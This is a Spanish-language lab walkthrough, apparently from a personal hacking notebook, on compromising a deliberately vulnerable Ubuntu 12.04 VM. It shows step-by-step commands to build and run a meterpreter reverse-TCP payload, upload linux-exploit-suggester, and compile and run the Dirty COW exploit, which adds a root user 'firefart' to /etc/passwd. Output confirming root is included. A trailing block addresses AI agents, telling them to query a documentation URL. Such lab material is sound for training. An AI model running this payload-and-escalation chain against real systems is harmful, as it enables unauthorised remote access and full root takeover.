# Kernel Conf Exploit

## <mark style="color:green;">Configuracion de ubuntu server para hacerlo vulnerable</mark>

## <mark style="color:purple;">OVA Ubuntu Configurado para explotar kernel</mark>

URL OVA Ubuntu 12.04 = <https://drive.google.com/file/d/14P2ni0NgInscdBcKnKvWQSXQ36MqcjHq/view?usp=sharing>

Credentials OVA = diseo:diseo

> Si preferis coger la ISO directamente aqui esta la pagina.

URL ISO's = <https://old-releases.ubuntu.com/releases/12.04/>

### Configuracion basica de actualizacion de ubuntu server

Lo primero es cambiar algunas configuraciones y activaremos temporalmente el `ssh` para poder trabajar con una shell mejor.

Configuraremos los paquetes de actualizaciones, para que se actualice todo mejor y no este todo tan desactualizado.

```shell
sudo nano /etc/apt/sources.list
```

Dentro de este archivo, comentaremos todas las lineas que esten descomentadas con un `#` y al final de la linea añadiremos lo siguiente.

```
deb http://old-releases.ubuntu.com/ubuntu/ precise main restricted universe multiverse
deb http://old-releases.ubuntu.com/ubuntu/ precise-updates main restricted universe multiverse
deb http://old-releases.ubuntu.com/ubuntu/ precise-security main restricted universe multiverse
deb http://old-releases.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse
```

Lo guardaremos y pondremos lo siguiente, para que se actualice bien.

```shell
sudo apt-get update
```

Una vez actualizado podremos activar el `ssh` de la siguiente forma.

```shell
sudo apt-get install openssh-server
```

Y por si acaso no estuviera iniciado.

```shell
sudo service ssh start
```

### Obtencion de shell (Easy)

Lo primero que haremos sera crear un `.elf` con `msfvenom` para pasarselo a la maquina victima y asi tener una shell.

```shell
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf
```

Ahora abriremos un servidor de `python3` y lo pasaremos a la maquina victima.

```shell
python3 -m http.server 80
```

Dentro de la maquina victima hacemos lo siguiente.

```shell
wget http://<IP>/shell.elf
```

Y ahora pasaremos a configurar en metasploit la escucha.

```shell
msfconsole -q
```

```shell
use multi/handler
```

Configguramos el exploit para que este a la escucha en nuestra IP y Puerto.

```shell
set payload linux/x64/meterpreter/reverse_tcp
set LHOST <IP>
set LPORT <PORT>
```

Ejecutamos la escucha.

```shell
run
```

Una vez hecho esto, ejecutaremos en la maquina victima el archivo `shell.elf` de la siguiente forma.

```shell
./shell.elf
```

Y si nos vamos a donde tenemos la escucha en metasploit, veremos una shell con el usuario que lo haya ejecutado.

## <mark style="color:purple;">Explotar kernel Ubuntu 12.04</mark>

Primero veremos que version de kernel tiene la maquina victima de la siguiente forma.

```shell
uname -a
```

Info:

```
Linux ubuntu 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
```

Vemos que el kernel es `3.2.0-23-generic`, por lo que veremos si tiene alguna vulnerabilidad de la siguiente forma.

URL GitHub = <https://github.com/The-Z-Labs/linux-exploit-suggester>

Clonamos el repositorio a nuestro host.

```shell
git clone https://github.com/The-Z-Labs/linux-exploit-suggester.git
cd linux-exploit-suggester
```

Cambiamos el nombre al script `.sh`.

```shell
mv linux-exploit-suggester.sh les.sh
```

Y ahora nos vamos a nuestro `meterpreter`.

```shell
cd /tmp/
```

```shell
upload /linux-exploit-suggester/les.sh
```

Info:

```
[*] Uploading  : /home/dise0/Desktop/linux-exploit-suggester/les.sh -> les.sh
[*] Uploaded -1.00 B of 88.73 KiB (-0.0%): /home/dise0/Desktop/linux-exploit-suggester/les.sh -> les.sh
[*] Completed  : /home/dise0/Desktop/linux-exploit-suggester/les.sh -> les.sh
```

Una vez que nos hayamos pasado el archivo a la maquina victima, lo ejecutaremos.

```shell
shell
/bin/bash -i
```

```shell
chmod +x les.sh
```

```shell
./les.sh
```

Info:

```
Available information:

Kernel version: 3.2.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 12.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

81 kernel space exploits
49 user space exploits

Possible Exploits:

cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2013-2094] perf_swevent

   Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
   Exposure: highly probable
   Tags: RHEL=6,[ ubuntu=12.04{kernel:3.2.0-(23|29)-generic} ],fedora=16{kernel:3.1.0-7.fc16.x86_64},fedora=17{kernel:3.3.4-5.fc17.x86_64},debian=7{kernel:3.2.0-4-amd64}
   Download URL: https://www.exploit-db.com/download/26131
   Comments: No SMEP/SMAP bypass

[+] [CVE-2013-2094] perf_swevent 2

   Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
   Exposure: highly probable
   Tags: [ ubuntu=12.04{kernel:3.(2|5).0-(23|29)-generic} ]
   Download URL: https://cyseclabs.com/exploits/vnik_v1.c
   Comments: No SMEP/SMAP bypass

[+] [CVE-2015-3202] fuse (fusermount)

   Details: http://seclists.org/oss-sec/2015/q2/520
   Exposure: probable
   Tags: debian=7.0|8.0,[ ubuntu=* ]
   Download URL: https://www.exploit-db.com/download/37089
   Comments: Needs cron or system admin interaction

[+] [CVE-2014-4699] ptrace/sysret

   Details: http://www.openwall.com/lists/oss-security/2014/07/08/16
   Exposure: probable
   Tags: [ ubuntu=12.04 ]
   Download URL: https://www.exploit-db.com/download/34134

[+] [CVE-2014-4014] inode_capable

   Details: http://www.openwall.com/lists/oss-security/2014/06/10/4
   Exposure: probable
   Tags: [ ubuntu=12.04 ]
   Download URL: https://www.exploit-db.com/download/33824

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2019-18634] sudo pwfeedback

   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
   Exposure: less probable
   Tags: mint=19
   Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
   Comments: sudo configuration requires pwfeedback to be enabled.

[+] [CVE-2019-15666] XFRM_UAF

   Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
   Exposure: less probable
   Download URL: 
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled

[+] [CVE-2018-1000001] RationalLove

   Details: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/
   Exposure: less probable
   Tags: debian=9{libc6:2.24-11+deb9u1},ubuntu=16.04.3{libc6:2.23-0ubuntu9}
   Download URL: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c
   Comments: kernel.unprivileged_userns_clone=1 required

[+] [CVE-2017-7308] af_packet

   Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
   Exposure: less probable
   Tags: ubuntu=16.04{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
   Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels

[+] [CVE-2017-6074] dccp

   Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
   Exposure: less probable
   Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
   Download URL: https://www.exploit-db.com/download/41458
   Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass

[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64

   Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
   Exposure: less probable
   Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
   Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
   Comments: Uses "Stack Clash" technique, works against most SUID-root binaries

[+] [CVE-2017-1000253] PIE_stack_corruption

   Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
   Exposure: less probable
   Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
   Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c

[+] [CVE-2016-2384] usb-midi

   Details: https://xairy.github.io/blog/2016/cve-2016-2384
   Exposure: less probable
   Tags: ubuntu=14.04,fedora=22
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
   Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user

[+] [CVE-2015-9322] BadIRET

   Details: http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/
   Exposure: less probable
   Tags: RHEL<=7,fedora=20
   Download URL: http://site.pi3.com.pl/exp/p_cve-2014-9322.tar.gz

[+] [CVE-2015-8660] overlayfs (ovl_setattr)

   Details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
   Exposure: less probable
   Tags: ubuntu=(14.04|15.10){kernel:4.2.0-(18|19|20|21|22)-generic}
   Download URL: https://www.exploit-db.com/download/39166

[+] [CVE-2015-8660] overlayfs (ovl_setattr)

   Details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/39230

[+] [CVE-2014-5207] fuse_suid

   Details: https://www.exploit-db.com/exploits/34923/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/34923

[+] [CVE-2014-0196] rawmodePTY

   Details: http://blog.includesecurity.com/2014/06/exploit-walkthrough-cve-2014-0196-pty-kernel-race-condition.html
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/33516

[+] [CVE-2013-2094] semtex

   Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
   Exposure: less probable
   Tags: RHEL=6
   Download URL: https://www.exploit-db.com/download/25444

[+] [CVE-2013-1959] userns_root_sploit

   Details: http://www.openwall.com/lists/oss-security/2013/04/29/1
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/25450

[+] [CVE-2013-0268] msr

   Details: https://www.exploit-db.com/exploits/27297/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/27297

[+] [CVE-2012-0809] death_star (sudo)

   Details: http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt
   Exposure: less probable
   Tags: fedora=16
   Download URL: https://www.exploit-db.com/download/18436
```

Esto nos dara una lista a parte de informacion de las diferentes vulnerabilidades que tiene el kernel actual, por lo que elegiremos una de ellas, en mi caso.

```
URL = https://www.exploit-db.com/exploits/40839

Download = https://www.exploit-db.com/download/40839
```

Una vez que nos lo hayamos descargado en nuestro host, nos lo pasaremos a la maquina victima.

```
Ctrl+z
y+ENTER
```

Y volveremos a nuestra shell de meterpreter para subir el archivo.

```shell
upload /Downloads/40839.c
```

Info:

```
[*] Uploading  : /Downloads/40839.c -> 40839.c
[*] Uploaded -1.00 B of 4.89 KiB (-0.02%): /Downloads/40839.c -> 40839.c
[*] Completed  : /Downloads/40839.c -> 40839.c
```

Ahora volveremos a la shell normal haciendo lo siguiente.

```shell
shell
/bin/bash -i
```

Ahora cambiaremos el nombre al archivo.

```shell
mv 40839.c dirty.c
```

Y despues lo compilaremos de la siguiente forma.

```shell
gcc -pthread dirty.c -o dirty -lcrypt
```

Y ahora lo ejecutaremos poniendo seguidamente la contarseña que queremos que se cree para el usuario con privilegios de `root`.

```shell
./dirty <NEW_PASS>
```

Info:

```
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 1234
Complete line:
firefart:fionu3giiS71.:0:0:pwned:/root:/bin/bash

mmap: 7fe680afd000
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '1234'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
diseo@ubuntu:/tmp$ /etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 1234
Complete line:
firefart:fionu3giiS71.:0:0:pwned:/root:/bin/bash

mmap: 7fe680afd000
madvise 0

Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '1234'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
```

Y una vez ejecutado, si vemos el archivo `passwd` podremos ver que hay un usuario llamado `firefart` que tiene la `bash` de `root` por lo que cambiaremos a ese usuario con la contraseña que le metimos.

(Igualmente nos dice que el usuario es `firefart` y la password la que hayamos puesto en mi caso `1234`)

```shell
ssh firefart@<IP>
```

Y una vez metida la contraseña entraremos como ese usuario `root`, si hacemos `id` veremos lo siguiente.

```shell
id
```

Info:

```
uid=0(firefart) gid=0(root) groups=0(root)
```

Por lo que vemos somos `root`.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://dise0.gitbook.io/h4cker_b00k/articulos/kernel-conf-exploit.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.